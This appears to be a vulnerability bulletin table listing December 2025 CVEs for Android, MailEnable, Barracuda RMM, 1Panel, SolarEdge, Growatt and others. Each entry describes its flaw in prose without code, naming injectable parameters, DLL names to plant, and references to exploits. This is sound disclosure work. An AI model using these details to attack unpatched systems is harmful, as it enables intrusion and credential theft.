| Google--Android | In multiple locations, there is a possible way to leak audio files across user profiles due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-22420 | https://android.googlesource.com/platform/frameworks/base/+/fb8f76eca9079c34af3e14ee0a58bc10a580ec42 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In notifyTimeout of CallRedirectionProcessor.java, there is a possible persistent connection due to improper input validation. This could lead to local escalation of privilege and background activity launches with User execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-22432 | https://android.googlesource.com/platform/packages/services/Telecomm/+/a43a880beaa6a64348a1d0c821e8c7e98d741a79 https://source.android.com/security/bulletin/2025-12-01 |
| TianoCore--EDK2 | EDK2 contains a vulnerability in BIOS where an attacker with local access may cause "Improper Input Validation". Successful exploitation of this vulnerability could alter control flow in unexpected ways, potentially allowing arbitrary command execution and impacting Confidentiality, Integrity, and Availability. | 2025-12-09 | not yet calculated | CVE-2025-2296 | https://github.com/tianocore/edk2/security/advisories/GHSA-6pp6-cm5h-86g5 |
| Apache Software Foundation--Apache Fineract | Weak Password Requirements vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.10.1. The issue is fixed in version 1.11.0. Users are encouraged to upgrade to version 1.13.0, the latest release. | 2025-12-12 | not yet calculated | CVE-2025-23408 | https://lists.apache.org/thread/bdlb6wl968yh1n48mr5npsk2spo6dncf |
| Apache Software Foundation--Apache HugeGraph-Server | A remote code execution vulnerability exists where a malicious Raft node can exploit insecure Hessian deserialization within the PD store. The fix enforces IP-based authentication to restrict cluster membership and implements a strict class whitelist to harden the Hessian serialization process against object injection attacks. Users are recommended to upgrade to version 1.7.0, which fixes the issue. | 2025-12-12 | not yet calculated | CVE-2025-26866 | https://github.com/apache/incubator-hugegraph/pull/2735 https://lists.apache.org/thread/ko8jkwbjbb99m45pg4sgo5xsm8gx9nsq |
| Google--Android | In ensureBound of RemotePrintService.java, there is a possible way for a background app to keep foreground permissions due to a permissions bypass. This could lead to local escalation of privilege with user execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-32319 | https://android.googlesource.com/platform/frameworks/base/+/70ab82c4546aa893682a4507664dc2c471d6cd95 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of Session.java, there is a possible way to view images belonging to a different user of the device due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-32328 | https://android.googlesource.com/platform/frameworks/base/+/e030442861f4dd0e03d67b65f0940b488007f0d7 https://source.android.com/security/bulletin/2025-12-01 |
| Google--Android | In multiple functions of Session.java, there is a possible way to view images belonging to a different user of the device due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2025-12-08 | not yet calculated | CVE-2025-32329 | https://android.googlesource.com/platform/frameworks/base/+/e030442861f4dd0e03d67b65f0940b488007f0d7 https://source.android.com/security/bulletin/2025-12-01 |
| Barracuda Networks--RMM | Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, does not verify the URL defined in an attacker-controlled WSDL that is later loaded by the application. This can lead to arbitrary file write and remote code execution via webshell upload. | 2025-12-10 | not yet calculated | CVE-2025-34392 | https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf https://www.barracuda.com/products/msp/network-protection/rmm https://www.vulncheck.com/advisories/barracuda-rmm-service-center-absolute-path-traversal-rce https://labs.watchtowr.com/soapwn-pwning-net-framework-applications-through-http-client-proxies-and-wsdl/ |
| Barracuda Networks--RMM | Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, does not correctly verify the name of an attacker-controlled WSDL service, leading to insecure reflection. This can result in remote code execution through either invocation of arbitrary methods or deserialization of untrusted types. | 2025-12-10 | not yet calculated | CVE-2025-34393 | https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf https://www.barracuda.com/products/msp/network-protection/rmm https://www.vulncheck.com/advisories/barracuda-rmm-service-center-insecure-reflection-rce |
| Barracuda Networks--RMM | Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, exposes a .NET Remoting service that is insufficiently protected against deserialization of arbitrary types. This can lead to remote code execution. | 2025-12-10 | not yet calculated | CVE-2025-34394 | https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf https://www.barracuda.com/products/msp/network-protection/rmm https://www.vulncheck.com/advisories/barracuda-rmm-service-center-net-remoting-deserialization-rce |
| Barracuda Networks--RMM | Barracuda Service Center, as implemented in the RMM solution, in versions prior to 2025.1.1, exposes a .NET Remoting service in which an unauthenticated attacker can invoke a method vulnerable to path traversal to read arbitrary files. This vulnerability can be escalated to remote code execution by retrieving the .NET machine keys. | 2025-12-10 | not yet calculated | CVE-2025-34395 | https://download.mw-rmm.barracudamsp.com/PDF/2025.1.1/RN_BRMM_2025.1.1_EN.pdf https://www.barracuda.com/products/msp/network-protection/rmm https://www.vulncheck.com/advisories/barracuda-rmm-service-center-net-remoting-path-traversal-rce |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAINFY.DLL from its application directory without sufficient integrity validation or a secure search order. If the DLL is missing, or if attacker-writable locations in the search path are consulted, a local attacker with write permission to such a directory can plant a malicious MEAINFY.DLL. When the executable is launched, it loads the attacker-controlled library and executes code with the privileges of the process, enabling local privilege escalation when the executable is run with elevated rights. | 2025-12-09 | not yet calculated | CVE-2025-34396 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meainfy-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Message parameter of /Mobile/Compose.aspx. The Message value is not properly sanitized when processed via a GET request and is reflected into a JavaScript context in the response. By supplying a crafted payload that terminates the existing script block/function, injects attacker-controlled JavaScript, and comments out the remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim opens the crafted reply URL. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34397 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-message-parameter-of-mobile-compose-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the AddressesBcc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The AddressesBcc value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the JavaScript variable var sAddrBcc. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34398 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-addressesbcc-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the AddressesCc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The AddressesCc value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the JavaScript variable var sAddrCc. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34399 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-addressescc-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the AddressesTo parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The AddressesTo value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the response. By supplying a crafted payload that terminates the existing JavaScript function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34400 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-addressesto-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the FieldBcc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The FieldBcc value is not properly sanitized when processed via a GET request and is reflected inside a <script> block in the JavaScript variable var BCCFieldProvided. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser during normal email composition. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34401 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-fieldbcc-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the FieldCc parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The FieldCc value is not properly sanitized when processed via a GET request and is reflected inside a <script> block in the JavaScript variable var CCFieldProvided. By supplying a crafted payload that terminates the existing LoadCurAddresses() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34402 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-fieldcc-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the FieldTo parameter of /Mondo/lang/sys/Forms/AddressBook.aspx. The FieldTo value is not properly sanitized when processed via a GET request and is reflected inside a <script> block in the JavaScript variable var fieldTo. By supplying a crafted payload that terminates the existing Finish() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34403 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-fieldto-parameter-of-addressbook-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the InstanceScope parameter of /Mondo/lang/sys/Forms/CAL/compose.aspx. The InstanceScope value is not properly sanitized when processed via a GET request and is reflected inside a <script> block in the JavaScript variable var gInstanceScope. By supplying a crafted payload that terminates the existing PageLoad() function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34404 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-instancescope-parameter-of-cal-compose-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Id parameter of /Mobile/ContactDetails.aspx. The Id value is not properly sanitized when processed via a GET request and is reflected within a <script> block in the response. By supplying a crafted payload that terminates an existing JavaScript function, inserts attacker-controlled script, and comments out remaining code, a remote attacker can execute arbitrary JavaScript in a victim's browser when the victim opens a malicious link. Successful exploitation can redirect victims to malicious sites, steal cookies not protected by HttpOnly, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34406 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-id-parameter-of-mobile-contactdetails-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the theme parameter of /Mondo/lang/sys/Forms/Statistics.aspx. The theme value is insufficiently sanitized when processed via a GET request and is reflected in the response, allowing an attacker to break out of an existing iframe context and inject arbitrary script. A remote attacker can supply a crafted payload that closes the iframe tag, inserts attacker-controlled JavaScript, and comments out remaining code, leading to script execution in a victim's browser when the victim visits a malicious link. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34407 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-theme-parameter-of-statistics-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Added parameter of /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx. The Added value is not properly sanitized when processed via a GET request and is reflected in the response, allowing an attacker to break out of existing markup and inject arbitrary script. A remote attacker can supply a crafted payload that closes an existing HTML list element, inserts attacker-controlled JavaScript, and comments out remaining code, leading to script execution in a victim's browser when the victim visits a malicious link. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34408 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-added-parameter-of-mai-addrecipientsresult-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the Failed parameter of /Mondo/lang/sys/Forms/MAI/AddRecipientsResult.aspx. The Failed value is not properly sanitized when processed via a GET request and is reflected in the response, allowing an attacker to break out of existing markup and inject arbitrary script. A remote attacker can supply a crafted payload that closes an existing HTML list element, inserts attacker-controlled JavaScript, and comments out remaining code, leading to script execution in a victim's browser when the victim visits a malicious link. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34409 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-failed-parameter-of-mai-addrecipientsresult-aspx |
| LXware--1Panel | 1Panel versions 1.10.33 through 2.0.15 contain a cross-site request forgery (CSRF) vulnerability in the Change Username functionality available from the settings panel (/settings/panel). The endpoint does not implement CSRF protections such as anti-CSRF tokens or Origin/Referer validation. An attacker can craft a malicious webpage that submits a username-change request; when a victim visits the page while authenticated, the browser includes valid session cookies and the request succeeds. This allows an attacker to change the victim's 1Panel username without consent. After the change, the victim is logged out and unable to log in with the previous username, resulting in account lockout and denial of service. | 2025-12-10 | not yet calculated | CVE-2025-34410 | https://github.com/1Panel-dev/1Panel/releases https://1panel.pro/ https://www.vulncheck.com/advisories/1panel-csrf-in-change-username-functionality-allows-account-lockout |
| DigitalPA S.r.l.--Legality WHISTLEBLOWING | Legality WHISTLEBLOWING by DigitalPA contains a protection mechanism failure in which critical HTTP security headers are not emitted by default. Affected deployments omit Content-Security-Policy, Referrer-Policy, Permissions-Policy, Cross-Origin-Embedder-Policy, Cross-Origin-Opener-Policy, and Cross-Origin-Resource-Policy (with CSP delivered via HTML meta elements being inadequate). The absence of these headers weakens browser-side defenses and increases exposure to client-side attacks such as cross-site scripting, clickjacking, referer leakage, and cross-origin data disclosure. | 2025-12-09 | not yet calculated | CVE-2025-34413 | https://seclists.org/fulldisclosure/2025/Dec/0 https://www.digitalpa.net/en/whistleblowing-software-features/ https://www.vulncheck.com/advisories/legality-whisteblowing-missing-critical-http-security-headers |
| Entrust Corporation--Instant Financial Issuance (IF) | Entrust Instant Financial Issuance (IFI) On Premise software (formerly referred to as CardWizard) versions 5.x, prior to 6.10.5, and prior to 6.11.1 contain an insecure .NET Remoting exposure in the Legacy Remoting Service that is enabled by default. The service registers a TCP remoting channel with SOAP and binary formatters configured at TypeFilterLevel=Full and exposes default ObjectURI endpoints. A remote, unauthenticated attacker who can reach the remoting port can invoke the exposed remoting objects to read arbitrary files from the server and coerce outbound authentication, and may achieve arbitrary file write and remote code execution via known .NET Remoting exploitation techniques. This can lead to disclosure of sensitive installation and service-account data and compromise of the affected host. | 2025-12-09 | not yet calculated | CVE-2025-34414 | https://www.entrust.com/products/issuance-systems/instant/financial-card https://www.entrust.com/knowledgebase https://www.vulncheck.com/advisories/entrust-ifi-legacy-remoting-unauthenticated-net-remoting-exposure |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIPO.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIPO.DLL, which is then loaded when the executable starts, resulting in execution of attacker-controlled code with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34416 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaipo-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAISO.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAISO.DLL, which is then loaded when the executable starts, resulting in execution of attacker-controlled code with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34417 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaiso-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIMF.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIMF.DLL, which is then loaded when the executable starts, resulting in execution of attacker-controlled code with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34418 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaimf-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAISM.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAISM.DLL, which is then loaded when the executable starts, resulting in execution of attacker-controlled code with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34419 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaism-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIAM.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIAM.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34420 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaiam-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAISP.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAISP.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34421 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaisp-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIPC.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIPC.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34422 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaipc-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIAU.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIAU.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34423 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaiau-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain an unsafe DLL loading vulnerability that can lead to local arbitrary code execution. The MailEnable administrative executable attempts to load MEAIDP.DLL from its installation directory without sufficient integrity validation or a secure search order. A local attacker with write access to that directory can plant a malicious MEAIDP.DLL, which is then loaded on execution, resulting in attacker-controlled code running with the privileges of the process. | 2025-12-10 | not yet calculated | CVE-2025-34424 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-dll-hijacking-via-unsafe-loading-of-meaidp-dll |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a reflected cross-site scripting (XSS) vulnerability in the WindowContext parameter of /Mondo/lang/sys/Forms/MAI/compose.aspx. The WindowContext value is not properly sanitized when processed via a GET request and is reflected within a <script> block, into the value assigned to window.location, allowing an attacker to break out of the existing script and inject arbitrary JavaScript. A remote attacker can supply a crafted payload that terminates the existing ProcessContextSwitchResult() function, inserts attacker-controlled script, and comments out remaining code, leading to script execution in a victim's browser when the victim visits a malicious link or attempts to send an email. Successful exploitation can redirect victims to malicious sites, steal non-HttpOnly cookies, inject arbitrary HTML or CSS, and perform actions as the authenticated user. | 2025-12-09 | not yet calculated | CVE-2025-34425 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-reflected-xss-in-windowscontext-parameter-of-mai-compose-aspx |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.TAB with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control. | 2025-12-10 | not yet calculated | CVE-2025-34427 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-cleartext-credential-storage-in-auth-tab |
| MailEnable--MailEnable | MailEnable versions prior to 10.54 contain a cleartext storage of credentials vulnerability that can lead to local credential compromise and account takeover. The product stores user and administrative passwords in plaintext within AUTH.SAV with overly permissive filesystem access. A local authenticated user with read access to this file can recover all user passwords and super-admin credentials, then use them to authenticate to MailEnable services such as POP3, SMTP, or the webmail interface, enabling unauthorized mailbox access and administrative control. | 2025-12-10 | not yet calculated | CVE-2025-34428 | https://mailenable.com/Standard-ReleaseNotes.txt https://www.mailenable.com/ https://www.vulncheck.com/advisories/mailenable-cleartext-credential-storage-in-auth-sav |
| LXware--1Panel | 1Panel versions 1.10.33 - 2.0.15 contain a cross-site request forgery (CSRF) vulnerability in the web port configuration functionality. The port-change endpoint lacks CSRF defenses such as anti-CSRF tokens or Origin/Referer validation. An attacker can craft a malicious webpage that submits a port-change request; when a victim visits it while authenticated, the browser includes valid session cookies and the request succeeds. This allows an attacker to change the port on which the 1Panel web service listens, causing loss of access on the original port and resulting in service disruption or denial of service, and may unintentionally expose the service on an attacker-chosen port. | 2025-12-10 | not yet calculated | CVE-2025-34429 | https://github.com/1Panel-dev/1Panel/releases https://1panel.pro/ https://www.vulncheck.com/advisories/1panel-csrf-web-port-configuration-change |
| LXware--1Panel | 1Panel versions 1.10.33 through 2.0.15 contain a cross-site request forgery (CSRF) vulnerability in the panel name management functionality. The affected endpoint does not implement CSRF defenses such as anti-CSRF tokens or Origin/Referer validation. An attacker can craft a malicious webpage that submits a panel-name change request; if a victim visits the page while authenticated, the browser includes valid session cookies and the request succeeds. This allows a remote attacker to change the victim's panel name to an arbitrary value without consent. | 2025-12-10 | not yet calculated | CVE-2025-34430 | https://github.com/1Panel-dev/1Panel/releases https://1panel.pro/ https://www.vulncheck.com/advisories/1panel-csrf-panel-name-modification |
| AnyDesk--AnyDesk | AnyDesk 7.0.15 and 9.0.1 contain an unquoted service path vulnerability that allows local non-privileged users to potentially execute code with elevated SYSTEM privileges. Attackers can exploit the unquoted service path configuration to inject malicious executables that will be run with high-level system permissions. | 2025-12-11 | not yet calculated | CVE-2025-34499 | ExploitDB-52258 ExploitDB-51968 AnyDesk Homepage AnyDesk Software Link VulnCheck Advisory: AnyDesk 9.0.1 Unquoted Service Path Privilege Escalation Vulnerability |
| kodcloud--KodExplorer | KodExplorer 4.52 contains an open redirect vulnerability in the user login page that allows attackers to manipulate the 'link' parameter. Attackers can craft malicious URLs in the link parameter to redirect users to arbitrary external websites after authentication. | 2025-12-11 | not yet calculated | CVE-2025-34504 | ExploitDB-52245 KodExplorer Homepage KodExplorer Release Page VulnCheck Advisory: KodExplorer 4.52 Open Redirect Vulnerability via User Login Endpoint |
| WBCE--WBCE CMS | WBCE CMS version 1.6.3 and prior contains an authenticated remote code execution vulnerability that allows administrators to upload malicious modules. Attackers can craft a specially designed ZIP module with embedded PHP reverse shell code to gain remote system access when the module is installed. | 2025-12-11 | not yet calculated | CVE-2025-34506 | ExploitDB-52132 WBCE CMS Homepage WBCE CMS GitHub Repository YouTube Demonstration Swammers8 GitHub Repository VulnCheck Advisory: WBCE CMS 1.6.3 Authenticated Remote Code Execution via Module Upload |
| SolarEdge--SE3680H | SolarEdge SE3680H has an exposed debug/test interface accessible to unauthenticated actors, allowing disclosure of system internals and execution of debug commands. | 2025-12-12 | not yet calculated | CVE-2025-36743 | https://csirt.divd.nl/CVE-2025-36743 https://csirt.divd.nl/DIVD-2025-00022/ |
| SolarEdge--SE3680H | SolarEdge SE3680H has unauthenticated disclosure of sensitive information during the bootloader loop. While the device repeatedly initializes and waits for boot instructions, the bootloader emits diagnostic output; this behavior can leak operating system information. | 2025-12-12 | not yet calculated | CVE-2025-36744 | https://csirt.divd.nl/CVE-2025-36744 https://csirt.divd.nl/DIVD-2025-00022/ |
| SolarEdge--SE3680H | SolarEdge SE3680H ships with an outdated Linux kernel containing unpatched vulnerabilities in core subsystems. An attacker with network or local access can exploit these flaws to achieve remote code execution, privilege escalation, or disclosure of sensitive information. | 2025-12-12 | not yet calculated | CVE-2025-36745 | https://csirt.divd.nl/CVE-2025-36745 https://csirt.divd.nl/DIVD-2025-00022/ |
| SolarEdge--SolarEdge Monitoring platform (SaaS) | SolarEdge monitoring platform contains a Cross-Site Scripting (XSS) flaw that allows an authenticated user to inject payloads into report names, which may execute in a victim's browser during a deletion attempt. | 2025-12-12 | not yet calculated | CVE-2025-36746 | https://csirt.divd.nl/CVE-2025-36746 https://csirt.divd.nl/DIVD-2025-00022/ |
| Growatt--ShineLan-X | A set of credentials for an FTP server was found within the ShineLan-X firmware, allowing testers to establish an insecure FTP connection with the server. This may allow an attacker to replace legitimate files being deployed to devices with their own malicious versions, since the firmware signature verification is not enforced. | 2025-12-13 | not yet calculated | CVE-2025-36747 | https://csirt.divd.nl/CVE-2025-36747/ |
| Growatt--ShineLan-X | ShineLan-X contains a stored cross-site scripting (XSS) vulnerability in the local configuration web server. A JavaScript code snippet can be inserted in the communication module's settings center. This may allow attackers to force a legitimate user's browser's JavaScript engine to run malicious code. | 2025-12-13 | not yet calculated | CVE-2025-36748 | https://csirt.divd.nl/CVE-2025-36748/ |
| Growatt--ShineLan-X | ShineLan-X contains a stored cross-site scripting (XSS) vulnerability in the Plant Name field. An HTML payload will be displayed on the plant management page via a direct post. This may allow attackers to force a legitimate user's browser's JavaScript engine to run malicious code. | 2025-12-13 | not yet calculated | CVE-2025-36750 | https://csirt.divd.nl/CVE-2025-36750/ |
